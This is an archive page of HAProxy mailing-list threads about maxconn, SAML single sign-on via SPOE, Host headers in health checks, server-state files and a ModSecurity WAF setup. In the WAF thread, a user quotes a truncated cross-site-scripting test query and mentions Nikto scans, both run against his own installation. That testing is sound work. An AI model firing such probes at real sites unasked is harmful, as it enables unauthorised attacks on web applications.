On Wed, Jun 26, 2019 at 2:52 AM William Dauchy  wrote:

> Hello,
>
> Using haproxy2.0 we are seeing logs with connection number while reloading:
> Proxy  stopped (FE: 0 conns, BE: 549563 conns).
>
> while we have in our configuration:
> global maxconn 262144
> defaults maxconn 262134
>
> I was wondering whether this could considered as expected to have a
> backend with more connections compared to the global parameter.
>
> Best,
> --
> William
>
>
Those maxconn values are per frontend so if your backend is referenced by
two frontends you might end up with a limit of 2 x maxconn on the backend.
Hence it is recommended to set maxconn per server too to protect from
situation like this. So read about maxconn and even fullconn in the server
config and tuning guide for more details.


Re: Proof of concept SPOE based SSO solution

2019-07-08 Thread Igor Cicimov
On Fri, Jul 5, 2019 at 11:12 AM Andrew Heberle 
wrote:

> Hi All,
>
> I have put together a Go based proof of concept SPOE agent that also
> implements a SAML 2 Service Provider (SP) in order to do "SSO" in
> HAProxy.
>
> The code is located here:
>
> https://gitlab.com/andrewheberle/go-http-auth-sso
>
> The basic process is that SPOA is used to check if the user is logged
> in or not and then based on the set variables you can make decisions
> via "http-request" rules.
>
> This originally started out without the SPOE part and was using the
> Lua http-auth-request script
> (https://github.com/TimWolla/haproxy-auth-request), however with the
> release of the Go SPOE package
> (https://github.com/Aestek/haproxy-connect/tree/master/spoe) I rewrote
> it based on that.
>
> Our use case is to have the SP pointed to a IdP in Azure so we can do
> single-sign-on to Office 365 and we have "http-request" rules in place
> to set some custom headers that our application uses for
> authentication/authorisation.  These are set based on the variables
> that come back from the SPOA, which come from the claims in the
> authentication process.
>
> Hopefully this is of some use to people.
>
> Any feedback and constructive criticism is welcome.
>
> --
> Andrew Heberle
>
>
Thanks for sharing Andrew!

Cheers,
Igor


The server-template and default-server options

2019-08-05 Thread Igor Cicimov
Hi all,

Just a quick one to confirm for sure, can/does server-template
considers/inherits the options from a default-server line?

Thanks,
Igor


Re: [PR/FEATURE] support for virtual hosts / Host header per server

2019-10-22 Thread Igor Cicimov
On Tue, Oct 22, 2019, 10:27 PM Morotti, Romain D <
romain.d.moro...@jpmorgan.com> wrote:

> Hello,
>
>
>
> The use case is to load balance applications in multiple datacenters or
> regions.
>
> The common pattern today to cover multiple locations is to deploy services
> in each location separately and independently.
>
>
>
> This happens with kubernetes for example, where a cluster is typically
> limited to a datacenter. Covering multiple locations is done by having
> independent clusters and provisioning the application to each of them.
>
> e.g. myapp.kube-naest1.example.com + myapp.kube-euwest.example.com.
>
>
>
> As a developer, I want to present the application on a single consistent
> URL with failover, e.g. myapp.example.com.
>
> Without getting into too much details, this is done with a layer of load
> balancing and this requires careful consideration around DNS, Host header,
> TLS SNI, certificates and healthcheck to work end-to-end.
>
>
>
> Let's take the two most basic use cases.
>
>
>
> # multi clusters use case
>
> backend foo
>
> mode http
>
> option httpchk GET /healthcheck
>
> http-send-name-header Host
>
> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>
> server myapp.kube-naest2.example.com myapp.kube-naest2.example.com:80
>
>
>
> # multi regions use case
>
> backend foo
>
> mode http
>
> option httpchk GET /healthcheck
>
> http-send-name-header Host
>
> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>
> server myapp.kube-euwest.example.com myapp.kube-euwest.example.com:80
>
>
>
> Each backend expects its own Host header, otherwise kubernetes cannot
> route and serve the request.
>
Can't you just set an Alias on your backend with all the expected domains
to serve for that vhost?

> In haproxy, this can be made to work using the "http-send-name-header
> Host" directive, that overrides the Host header per backend.
>
>
>
> This setup fails in practice because of the healthcheck failing. The
> healthcheck request sent by haproxy doesn't have a host header. It ignores
> the "http-send-name-header" directive and there is no option to set the
> healthcheck host per backend.
>
> (Similar challenge with TLS SNI, that is easily worked around by disabling
> TLS checks. There are settings "sni req.hdr(host)" and "check-sni" to
> adjust, with little information on all these settings combine).
>
>
>
> The proposed patch intended to add one setting per backend to manage the
> host header end-to-end consistently and reliably: adjusting healthchecks,
> forwarding requests and TLS domain.
>
>
>
> If you prefer not to do this, I can think of a less intrusive patch to
> configure the healthcheck.
>
> Since there is already the "http-send-name-header Host" directive, whose
> main use case is to adjust the Host header per backend.
>
> I could patch the healthcheck code to follow that directive when running
> https healthchecks, if that’s okay with you.
>
>
>
> Thinking of it, it could be considered a bug that the healthcheck doesn't
> do that already. If I configure all my servers to get a header, it’s
> certainly important and I expect the healthcheck to get it too.
>
>
>
> Related questions and issues:
>
>
> https://serverfault.com/questions/876871/configure-haproxy-to-include-host-headers-for-different-backends
>
>
> https://serverfault.com/questions/770737/making-haproxy-pass-a-host-name-in-httpcheck
>
>
> https://serverfault.com/questions/594669/haproxy-health-checking-multiple-servers-with-different-host-names
>
>
>
>
>
> Regards.
>
>
>
>
>
> *From:* Willy Tarreau [mailto:w...@1wt.eu]
> *Sent:* 03 October 2019 05:51
> *To:* Morotti, Romain D (CIB Tech, GBR) 
> *Cc:* haproxy@formilux.org; Sayar, Guy H (CIB Tech, GBR) <
> guy.h.sa...@jpmorgan.com>
> *Subject:* Re: [PR/FEATURE] support for virtual hosts / Host header per
> server
>
>
>
> Hello Romain,
>
> On Tue, Oct 01, 2019 at 12:08:03PM +, Morotti, Romain D wrote:
> > What is the status on this?
>
> Sorry, but it took some time to work on other priorities, and to be
> honest, the subject looked scary enough to deserve enough time to
> study it. Sadly, if I can say, the subject was pretty descriptive of
> what it does, and this is fundamentally wrong.
>
> So just to summarize for those who haven't had a look at the patch,
> what this patch does is to replace the host header in requests sent to
> a server with one specified for this server, resulting in each server
> within the same farm to run on a different vhost. This goes back to
> the errors that plagued many hosting infrastructures in the late 90s
> and early 2000s where redirects, hosts in pages etc were wrong because
> the application was called with an internal name instead of the correct
> one. Moreover this used to prevent servers from being shared between
> multiple hosts since the host header was containing rubish. For
> reference, Apache merged the ProxyPreserveHost in 2.0.31 in 2002 to put
> an end to th

Re: [PR/FEATURE] support for virtual hosts / Host header per server

2019-10-22 Thread Igor Cicimov
On Wed, Oct 23, 2019, 8:36 AM Igor Cicimov 
wrote:

>
>
> On Tue, Oct 22, 2019, 10:27 PM Morotti, Romain D <
> romain.d.moro...@jpmorgan.com> wrote:
>
>> Hello,
>>
>>
>>
>> The use case is to load balance applications in multiple datacenters or
>> regions.
>>
>> The common pattern today to cover multiple locations is to deploy
>> services in each location separately and independently.
>>
>>
>>
>> This happens with kubernetes for example, where a cluster is typically
>> limited to a datacenter. Covering multiple locations is done by having
>> independent clusters and provisioning the application to each of them.
>>
>> e.g. myapp.kube-naest1.example.com + myapp.kube-euwest.example.com.
>>
>>
>>
>> As a developer, I want to present the application on a single consistent
>> URL with failover, e.g. myapp.example.com.
>>
>> Without getting into too much details, this is done with a layer of load
>> balancing and this requires careful consideration around DNS, Host header,
>> TLS SNI, certificates and healthcheck to work end-to-end.
>>
>>
>>
>> Let's take the two most basic use cases.
>>
>>
>>
>> # multi clusters use case
>>
>> backend foo
>>
>> mode http
>>
>> option httpchk GET /healthcheck
>>
>> http-send-name-header Host
>>
>> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>>
>> server myapp.kube-naest2.example.com myapp.kube-naest2.example.com:80
>>
>>
>>
>> # multi regions use case
>>
>> backend foo
>>
>> mode http
>>
>> option httpchk GET /healthcheck
>>
>> http-send-name-header Host
>>
>> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>>
>> server myapp.kube-euwest.example.com myapp.kube-euwest.example.com:80
>>
>>
>>
>> Each backend expects its own Host header, otherwise kubernetes cannot
>> route and serve the request.
>>
> Can't you just set an Alias on your backend with all the expected domains
> to serve for that vhost?
>

Sorry misread your issue. It is a strange setup you got there wonder why do
you need cross DC load balancing on the k8s ingress when you are already
doing it globally via DNS?

> In haproxy, this can be made to work using the "http-send-name-header
>> Host" directive, that overrides the Host header per backend.
>>
>>
>>
>> This setup fails in practice because of the healthcheck failing. The
>> healthcheck request sent by haproxy doesn't have a host header. It ignores
>> the "http-send-name-header" directive and there is no option to set the
>> healthcheck host per backend.
>>
>> (Similar challenge with TLS SNI, that is easily worked around by
>> disabling TLS checks. There are settings "sni req.hdr(host)" and
>> "check-sni" to adjust, with little information on all these settings
>> combine).
>>
>>
>>
>> The proposed patch intended to add one setting per backend to manage the
>> host header end-to-end consistently and reliably: adjusting healthchecks,
>> forwarding requests and TLS domain.
>>
>>
>>
>> If you prefer not to do this, I can think of a less intrusive patch to
>> configure the healthcheck.
>>
>> Since there is already the "http-send-name-header Host" directive, whose
>> main use case is to adjust the Host header per backend.
>>
>> I could patch the healthcheck code to follow that directive when running
>> https healthchecks, if that’s okay with you.
>>
>>
>>
>> Thinking of it, it could be considered a bug that the healthcheck doesn't
>> do that already. If I configure all my servers to get a header, it’s
>> certainly important and I expect the healthcheck to get it too.
>>
>>
>>
>> Related questions and issues:
>>
>>
>> https://serverfault.com/questions/876871/configure-haproxy-to-include-host-headers-for-different-backends
>>
>>
>> https://serverfault.com/questions/770737/making-haproxy-pass-a-host-name-in-httpcheck
>>
>>
>> https://serverfault.com/questions/594669/haproxy-health-checking-multiple-servers-with-different-host-names
>>
>>
>>
>>
>>
>> Regards.
>>
>>
>>
>>
>>
>> *From:* Willy Tarreau [mailto:w...@1wt.eu]
>> *Sent:* 03 October 2019 05:51
>> *To:* Morotti, Romain D (CIB Tech, GBR) 
>> *Cc:* 

Re: [PR/FEATURE] support for virtual hosts / Host header per server

2019-11-03 Thread Igor Cicimov
HI Willy,

On Thu, Oct 31, 2019 at 8:56 PM Willy Tarreau  wrote:
>
> Hi Romain,
>
> On Fri, Oct 25, 2019 at 12:55:31PM +, Morotti, Romain D wrote:
> > Hello,
> >
> > Patch attached. Adding an option "http-check send-name-header ".
> > It adds a header per server in healthchecks, similar usage to
> > "http-send-name-header". Built and tested locally.
>
> So I'm still not totally fond of it to be honest, at an era where
> people are using server-templates to dynamically populate their
> farms with fixed server names, and will instead replace the FQDN
> at run time when populating their farms but I do see at least
> some consistency in your use case.
>
> I thought we could start better with limited extra effort by adding
> one argument to the servers, that could later be changed from the
> CLI so that users can decide how they update their farms.
>
> Also for all those using DNS, it's actually the server's FQDN and not
> its internal config name which will be required to be sent. As such I
> still think that this feature as-is will quickly be deprecated and
> dropped in future releases by lack of relevant use case.
>
> If others think we should take this patch as a temporary step, I'm
> not fundamentally against it, I'm just seeing it as a temporary hack.
> In this case it will be desirable to write more than just a one-liner
> for the keyword documentation entry and explain what it really does
> so that it doesn't drive some users to wrong conclusions.
>
> What do others think ? Igor maybe you have a particular opinion on
> this one ? Baptiste, anything from the dynamic use cases you're aware
> of ?
>
> Thanks,
> Willy

As far as kubernetes is concerned the proper way to implement cross-cluster
setup as in the OP's case is via Federation. I have never done it but, just from
looking at the docs, I can say for sure it is not an easy task to take on. Far
more complex than forging host headers I must say ;-).

Sorry I can't provide any useful input, as a humble user I usually go with what
ever the clever people of this great project come up with and I'm sure it will
always be the right decision.

Regards,
Igor



ModSecurity testing

2019-12-09 Thread Igor Cicimov
Hi all,

I have a quick question about running ModSecurity in Haproxy. I followed
the guide https://github.com/haproxy/haproxy/tree/master/contrib/modsecurity,
have compiled the modsecurity binary and have setup all required
configuration for Haproxy as per the guide.

I have ModSecurity running locally on port 12345:

$ modsecurity -d -n 1 -p 12345 -f /etc/modsecurity/modsecurity.conf -f
/etc/modsecurity/owasp-modsecurity-crs.conf575948204.684882 [00]
ModSecurity for nginx (STABLE)/2.9.2 (http://www.modsecurity.org/)
configured.
1575948204.684938 [00] ModSecurity: APR compiled version="1.7.0"; loaded
version="1.7.0"
1575948204.684949 [00] ModSecurity: PCRE compiled version="8.38 "; loaded
version="8.38 2015-11-23"
1575948204.685084 [00] ModSecurity: YAJL compiled version="2.1.0"
1575948204.685096 [00] ModSecurity: LIBXML compiled version="2.9.3"
1575948204.685103 [00] ModSecurity: Status engine is currently disabled,
enable it by set SecStatusEngine to On.
1575948204.701154 [00] Worker 01 initialized

and can see Haproxy connecting to the service in its own logs and
ModSecurity output:

Available filters :
[SPOE] spoe
[COMP] compression
[TRACE] trace
Using epoll() as the polling mechanism.
localhost haproxy[518]: Proxy my-front started.
localhost haproxy[518]: Proxy my-front started.
localhost haproxy[518]: Proxy spoe-modsecurity started.

The Haproxy config is quite simple as per the guide:

listen my-front
timeout client 5s
timeout connect 5s
timeout server 5s
mode http
bind :9080
log-format "The txn.modsec.code is: %[var(txn.modsec.code)]"
filter spoe engine modsecurity config /etc/haproxy/spoe-modsecurity.conf
http-request deny if { var(txn.modsec.code) -m int gt 0 }
server local 127.0.0.1:8080

backend spoe-modsecurity
mode tcp
timeout connect 5s
timeout server  3m
server iprep1 127.0.0.1:12345

As you can see I have the OWASP rules setup under /etc/modsecurity/ and the
SecRuleEngine is enabled:

$ grep SecRuleEngine /etc/modsecurity/modsecurity.conf
SecRuleEngine On

and the rules loaded (I guess):

$ cat /etc/modsecurity/owasp-modsecurity-crs.conf
Include /etc/modsecurity/owasp-modsecurity-crs/crs-setup.conf
Include
/etc/modsecurity/owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf
[...]

and SecDefaultAction set to 403:

$ grep DefaultAction /etc/modsecurity/owasp-modsecurity-crs/crs-setup.conf
| grep -v "^#" | grep .
SecDefaultAction "phase:1,log,auditlog,deny,status:403"
SecDefaultAction "phase:2,log,auditlog,deny,status:403"

However, for the life of me I can not make any successful test and get 403
error from Haproxy when sending test load (as per the guide). For the
example query mentioned there "?param=">alert(1);" Haproxy
replies with 400 instead of 403. I have also tried running Nikto2 scanner
that should for sure be detected by the scanner rules but all I get is
negative value or not value at all for the txn.modsec.code variable return
by ModSecurity:

haproxy[32752]: The txn.modsec.code is: -101
haproxy[32752]: The txn.modsec.code is: -
haproxy[32752]: The txn.modsec.code is: -101
haproxy[32752]: message repeated 1408 times: [ The txn.modsec.code is: -101]
haproxy[32752]: The txn.modsec.code is: -
haproxy[32752]: The txn.modsec.code is: -101

The ModSecurity output during the test:

1575948214.855512 [00] <1> New Client connection accepted and assigned to
worker 01
1575948214.855689 [01] <1> read_frame_cb
1575948214.855767 [01] <1> New Frame of 129 bytes received
1575948214.855787 [01] <1> Decode HAProxy HELLO frame
1575948214.855804 [01] <1> Supported versions : 2.0
1575948214.855819 [01] <1> HAProxy maximum frame size : 16380
1575948214.855836 [01] <1> HAProxy capabilities : pipelining,async
1575948214.855855 [01] <1> HAProxy supports frame pipelining
1575948214.855872 [01] <1> HAProxy supports asynchronous frame
1575948214.855888 [01] <1> HAProxy engine id :
c2accfac-1da0-4593-81c5-1ad2749be68b
1575948214.855908 [01] <1> Encode Agent HELLO frame
1575948214.855926 [01] <1> Agent version : 2.0
1575948214.855943 [01] <1> Agent maximum frame size : 16380
1575948214.855958 [01] <1> Agent capabilities :
1575948214.855994 [01] <1> write_frame_cb
1575948214.856472 [01] <1> Frame of 54 bytes send
1575948214.856521 [01] <1> read_frame_cb
1575948214.856546 [01] <1> New Frame of 196 bytes received
1575948214.856562 [01] <1> Decode HAProxy NOTIFY frame
1575948214.856578 [01] <1> STREAM-ID=2232 - FRAME-ID=1 - unfragmented frame
received - frag_len=0 - len=196 - offset=8
1575948214.856606 [01] Process frame messages : STREAM-ID=2232 - FRAME-ID=1
- length=188 bytes
1575948214.856623 [01] Process SPOE Message 'check-request'
1575948214.857123 [01] Encode Agent ACK frame
1575948214.857154 [01] STREAM-ID=2232 - FRAME-ID=1
1575948214.857169 [01] Add action : set variable code=4294967195
1575948214.857219 [01] <1> write_frame_cb
1575948214.857648 [01] <1> Frame of 31 bytes send

Testing with Haproxy 2.0.10 but same result with 1.8.2

Re: PROXY protocol and check port

2019-12-16 Thread Igor Cicimov
Hi,

On Tue, Dec 17, 2019 at 2:55 AM Olivier D  wrote:

> Hello,
>
> I found what was wrong : I was using "load-server-state-from-file" and
> previous config file was using port 80 as server port.
> It seems using this instruction loads previous server state but also
> previous srv_port.
> Is this an expected behaviour ?
>

Yes, basically it is your responsibility to dump the current state into the
file otherwise you'll gate outdated data as you noticed. For example I add:

ExecReload=/bin/echo "show servers state" | /usr/bin/socat stdio
/run/haproxy/admin.sock > /var/lib/haproxy/state

in the systemd service file.


Re: ModSecurity testing

2019-12-16 Thread Igor Cicimov
Hi Joao,

On Sat, Dec 14, 2019 at 11:30 PM Joao Morais  wrote:

>
>
> > Em 13 de dez de 2019, à(s) 10:09, Christopher Faulet <
> cfau...@haproxy.com> escreveu:
> >
> > Le 10/12/2019 à 05:24, Igor Cicimov a écrit :
> >>
> >> Testing with Haproxy 2.0.10 but same result with 1.8.23. The versions
> of ModSecurity is 2.9.2 and the OWASP rules v3.0.2
> >> What am I doing wrong? Can anyone provide a request that should confirm
> if the module is working or not from or share the experience from their own
> setup?
> >
> > Hi Igor,
> >
> > First of all, I don't know how the modsecurity agent really work. But
> I'm surprised to see it returns -101. In the code, -1, 0 or an HTTP status
> code is expected. And only 0 or the HTTP status code is returned to
> HAProxy. I don't know if -101 is a valid return value from modsecurity
> point of view. But it is not from the agent one.
> >
> > Then, You don't have an error 403 because the variable txn.modsec.code
> is negative, so the deny http-request rule is never triggered. So, I guess
> your error 400 comes from your webserver. You can enabled HTTP log to have
> more information.
> >
> > Finally, I notice some requests to the SPOA agent seems to have failed.
> The variable is not set (- in the logs). You can try to enable SPOE logs in
> your SPOE engine configuration. Take a look at the SPOE documentation
> (doc/SPOE.txt) for more information.
>
>
> Hi, perhaps this thread helps:
>
> https://www.mail-archive.com/haproxy@formilux.org/msg30061.html
>
> And perhaps this building of ModSecurity SPOA will also help:
>
>
> https://github.com/jcmoraisjr/modsecurity-spoa/blob/v0.5/rootfs/Dockerfile
>
> ~jm
>

First thanks for your reply, I've been following your work on
haproxy-ingress for Kubernetes (where I can see you have incorporated
ModSecurity) and your input is certainly appreciated on this matter.

I had some time today to quickly run the test again after enabling the log
for SPOE:

[modsecurity]
spoe-agent modsecurity-agent
log global
messagescheck-request
option  var-prefix  modsec
option  continue-on-error
timeout hello   100ms
timeout idle30s
timeout processing  1s
use-backend spoe-modsecurity

spoe-message check-request
args unique-id method path query req.ver req.hdrs_bin req.body_size
req.body
event on-frontend-http-request

and can see that the empty values coming from SPOE are legit and are due to
SEARCH method that is not allowed by Haproxy:

Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.accept(000a)=0016 from [127.0.0.1:53206] ALPN=
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clireq[0016:]: SEARCH / HTTP/1.1
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: user-agent: Mozilla/5.0 (Windows
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/74.0.3729.169 Safari/537.36
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: content-type:
application/x-www-form-urlencoded
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: content-length: 1
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: host: localhost:9080
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1343:my-front.srvcls[0017:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1343:my-front.clicls[0017:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1343:my-front.closed[0017:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvrep[0016:0013]: HTTP/1.1 405 Method Not Allowed
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: SPOE: [modsecurity-agent]
 sid=4933 st=0 0/0/0/0/0 4/4 0/0 0/2768
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: The txn.modsec.code is: -
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvhdr[0016:0013]: server: ecstatic-3.3.2
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: The txn.modsec.code is: -
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: SPOE: [modsecurity-agent]
 sid=4935 st=0 0/0/0/0/0 4/4 0/0 0/2769
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvhdr[0016:0013]: date: Tue, 17 Dec 2019 00:40:01 GMT
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvhdr[0016:0013]: content-length: 0
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvcls[0016:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clicls[0016:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.closed[0016:0013]

and some other methods like TRACK, PROPFIND, DEBUG that NIkto tries out.

Apart from that, I'm still equally stumped as I

Re: PROXY protocol and check port

2019-12-17 Thread Igor Cicimov
Hi Olivier,

On Tue, Dec 17, 2019 at 7:20 PM Olivier D  wrote:

> Hello Igor,
>
>
> Le lun. 16 déc. 2019 à 23:41, Igor Cicimov 
> a écrit :
>
>> Hi,
>>
>> On Tue, Dec 17, 2019 at 2:55 AM Olivier D  wrote:
>>
>>> Hello,
>>>
>>> I found what was wrong : I was using "load-server-state-from-file" and
>>> previous config file was using port 80 as server port.
>>> It seems using this instruction loads previous server state but also
>>> previous srv_port.
>>> Is this an expected behaviour ?
>>>
>>
>> Yes, basically it is your responsibility to dump the current state into
>> the file otherwise you'll gate outdated data as you noticed. For example I
>> add:
>>
>> ExecReload=/bin/echo "show servers state" | /usr/bin/socat stdio
>> /run/haproxy/admin.sock > /var/lib/haproxy/state
>>
>> in the systemd service file.
>>
>
> That's not what I was saying. I'm already using "show server state", and
> that's exactly what leads me to hours of debugging : between two versions
> of my haproxy config file, I changed backend server port from 80 to 443.
> When HAProxy reloaded, it loaded server state file and loaded both the
> previous state(up/down) of the server, but also the server port. That's why
> HAProxy never used port 443 as backend port and was still using old port 80.
>

Ah I get ya, yeah have not had a case like that yet but it is strange.
Probably should wait for someone with knowledge of the code to answer your
question :-/

> This is not clearly stated in the configuration (or maybe I missed it ?),
> that's why I was asking whether it is an expected behaviour. In my mind,
> the server state was only used to get server status between two reload, not
> more informations.
>
> Olivier
>
>


Termination state IR--

2020-01-28 Thread Igor Cicimov
Hi all,

I'm asking this question here since I read in the docs that if I see "Ixxx"
in the session "termination_state" log I should do so :-)

The error I got while experimenting with the HAP config is as follows:

Jan 29 03:33:44 ip-172-31-45-201 haproxy[124024]: :44296
[29/Jan/2020:03:33:44.952] fe_https~ host.mydomain.com/
-1/-1/-1/-1/0 500 0 - - IR-- 1/1/5/0/3 0/0 "GET /api/search HTTP/1.1"

The command that produced it:

$ curl -vsSNiL -H "Host: host.mydomain.com"
https://haproxy.example.com:8443/api/search

And the relevant haproxy-2.0.12 configuration (it's in AWS):

resolvers vpc
nameserver dns1 172.31.0.2:53
accepted_payload_size 8192
resolve_retries   30
timeout resolve   1s
timeout retry 2s
hold valid30s
hold other30s
hold refused  30s
hold nx   30s
hold timeout  30s
hold obsolete 30s

frontend fe_https
bind *:8443 ssl crt /etc/haproxy/ssl.d/ alpn h2,http/1.1
mode http
option httplog
use_backend %[req.hdr(host),word(1,:),lower]

backend host.mydomain.com
mode tcp
option tcp-check
tcp-check connect port 443 ssl
balance source
default-server inter 60s downinter 30s rise 2 fall 2 slowstart 10s
weight 100 ca-file /etc/ssl/certs/ca-certificates.crt on-marked-down
shutdown-sessions
server myhost host.mydomain.com:443 verify none check resolvers vpc
resolve-prefer ipv4

Haproxy version dump:

# haproxy -vv
HA-Proxy version 2.0.12-1ppa~xenial 2019/12/21 - https://haproxy.org/
Build options :
  TARGET  = linux-glibc
  CPU = generic
  CC  = gcc
  CFLAGS  = -O2 -g -O2 -fPIE -fstack-protector-strong -Wformat
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2
-fno-strict-aliasing -Wdeclaration-after-statement -fwrapv
-Wno-unused-label -Wno-sign-compare -Wno-unused-parameter
-Wno-old-style-declaration -Wno-ignored-qualifiers -Wno-clobbered
-Wno-missing-field-initializers -Wtype-limits
  OPTIONS = USE_PCRE2=1 USE_PCRE2_JIT=1 USE_REGPARM=1 USE_OPENSSL=1
USE_LUA=1 USE_ZLIB=1 USE_SYSTEMD=1

Feature list : +EPOLL -KQUEUE -MY_EPOLL -MY_SPLICE +NETFILTER -PCRE
-PCRE_JIT +PCRE2 +PCRE2_JIT +POLL -PRIVATE_CACHE +THREAD -PTHREAD_PSHARED
+REGPARM -STATIC_PCRE -STATIC_PCRE2 +TPROXY +LINUX_TPROXY +LINUX_SPLICE
+LIBCRYPT +CRYPT_H -VSYSCALL +GETADDRINFO +OPENSSL +LUA +FUTEX +ACCEPT4
-MY_ACCEPT4 +ZLIB -SLZ +CPU_AFFINITY +TFO +NS +DL +RT -DEVICEATLAS
-51DEGREES -WURFL +SYSTEMD -OBSOLETE_LINKER +PRCTL +THREAD_DUMP -EVPORTS

Default settings :
  bufsize = 16384, maxrewrite = 1024, maxpollevents = 200

Built with multi-threading support (MAX_THREADS=64, default=1).
Built with OpenSSL version : OpenSSL 1.0.2g  1 Mar 2016
Running on OpenSSL version : OpenSSL 1.0.2g  1 Mar 2016
OpenSSL library supports TLS extensions : yes
OpenSSL library supports SNI : yes
OpenSSL library supports : TLSv1.0 TLSv1.1 TLSv1.2
Built with Lua version : Lua 5.3.1
Built with network namespace support.
Built with transparent proxy support using: IP_TRANSPARENT IPV6_TRANSPARENT
IP_FREEBIND
Built with zlib version : 1.2.8
Running on zlib version : 1.2.8
Compression algorithms supported : identity("identity"),
deflate("deflate"), raw-deflate("deflate"), gzip("gzip")
Built with PCRE2 version : 10.21 2016-01-12
PCRE2 library supports JIT : yes
Encrypted password support via crypt(3): yes
Built with the Prometheus exporter as a service

Available polling systems :
  epoll : pref=300,  test result OK
   poll : pref=200,  test result OK
 select : pref=150,  test result OK
Total: 3 (3 usable), will use epoll.

Available multiplexer protocols :
(protocols marked as  cannot be specified using 'proto' keyword)
  h2 : mode=HTXside=FE|BE mux=H2
  h2 : mode=HTTP   side=FEmux=H2
: mode=HTXside=FE|BE mux=H1
: mode=TCP|HTTP   side=FE|BE mux=PASS

Available services :
prometheus-exporter

Available filters :
[SPOE] spoe
[COMP] compression
[CACHE] cache
[TRACE] trace

I'm sure I've done something wrong since I have exactly the same backend
working fine with frontend in TCP mode using "ssl_sni" like so:

frontend fe_https_tcp
bind *:8443
mode tcp
option tcplog
tcp-request connection reject if !{ src -f /etc/haproxy/whitelist.lst }
tcp-request inspect-delay 5s
tcp-request content accept if { req.ssl_hello_type 1 }
use_backend host.mydomain.com if { req.ssl_sni -i host.mydomain.com }

Thanks,
Igor


  1   2   3   >